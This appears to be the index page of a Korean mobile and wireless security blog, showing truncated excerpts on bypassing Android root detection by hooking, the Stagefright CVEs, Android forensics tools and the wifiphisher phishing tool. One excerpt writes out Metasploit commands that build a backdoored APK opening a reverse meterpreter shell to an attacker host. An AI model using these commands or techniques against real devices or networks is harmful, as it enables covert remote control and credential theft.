전체 글 (123) 썸네일형 리스트형 Android Rooting 체크 우회(Hooking with Cydia Substrate) 일부 금융 모바일 애플리케이션의 경우 Super user 권한을 임시 비활성화해도 정상 작동하지만 대부분의 금융 애플리케이션은 위변조를 통하여 Android 플랫폼 위변조를 탐지를 우회하게 된다. 하지만 최근 모바일 애플리케이션은 난독화, 재컴파일 방지, 위변조 탐지 등을 통해서 애플리케이션 위변조를 이용한 Super user 권한 탐지 우회가 어려워지고 있다. Android Hooking 후킹(영어: hooking)은 소프트웨어 공학 용어로, 운영 체제나 응용 소프트웨어 등의 각종 컴퓨터 프로그램에서 소프트웨어 구성 요소 간에 발생하는 함수 호출, 메시지, 이벤트 등을 중간에서 바꾸거나 가로채는 명령, 방법, 기술이나 행위를 말한다. 이때 이러한 간섭된 함수 호출, 이벤트 또는 메시지를 처리하는 코드를.. [Android Exploit] Android Exploit with metasploit metasploit reverse_tcp android http://exploiterz.blogspot.kr/2013/07/how-to-hack-android-devices-using.html 메타익스플로잇을 사용하여 안드로이드 Exploit Code가 포함된 APK 생성 및 리버스커넥션 연결하기 # ifconfig # msfpayload android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 R > oneandonlyme.apk # msfconsole msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp msf exploit(handl.. [Android Exploit] Stagefright 취약점 Android 미디어 파일을 처리하는 Stagefright에서 다수의 정수 오버플로우 취약점이 발견되어 해커가 조작된 미디어 파일을 MMS를 이용하여 피해자로 전송할 경우 사용자의 인지 없이 원격 코드 실행 및 권한상승이 가능하다. 영향 받는 버전 안드로이드 2.2(Froyo) ~ 5.1.1_r5(Lollipop) Common Vulnerabilities and Exposures (CVE) 번호 CVE-2015-1538 CVE-2015-1539 CVE-2015-3824 CVE-2015-3826 CVE-2015-3827 CVE-2015-3828 테스트 https://www.exploit-db.com/exploits/38124/ exploit code를 실행하면 수많은 에러 메세지가 발생한다. Linux에서.. Android Tool Please use left sidebar to navigate between sections. Last Updated on: 8-May-2015 Forensics Tools Android Forensics - Open Source Android Forensics App and Framework Android Data Extractor Lite BitPim - BitPim is a program that allows you to view and manipulate data on many CDMA phones from LG, Samsung, Sanyo and other manufacturers. LiME - LiME (formerly DMD) is a Loadable Kernel Module (LKM), .. [Wi-Fi] wifiphisher 개요 무선 네트워크에서 암호문과 인증 정보를 획득하기 위한 자동화된 피싱 공격 툴이다. 무차별 공격을 하지 않고 사회 공학적 방법을 이용하여 WPA/WPA2의 암호문과 인증정보를 쉽게 획득 가능하다. wifiphisher는 칼리 리눅스에서 동작하며 MIT라이센스 아래 사용 가능하다. 절차 1. Victim은 AP로 미인증 상태 - 네트워크 범위 내에 존재하는 모든 wifi 디바이스에 deauth 패킷을 전송하여 트래픽 혼잡을 일으킨다. 2. Clinet는 가짜 AP(Acess point)에 접근 - 설정 상태를 복사한 AP를 도청한다. 그 다음 설정 상태를 복사한 AP를 가짜로 생성한다. Client가 가짜 AP로 연결을 시도하게되어 중간자 공격을 당하게 된다. 3. 실제 라우터 설정으로 보이는 페이지 .. 이전 1 2 3 4 5 ··· 25 다음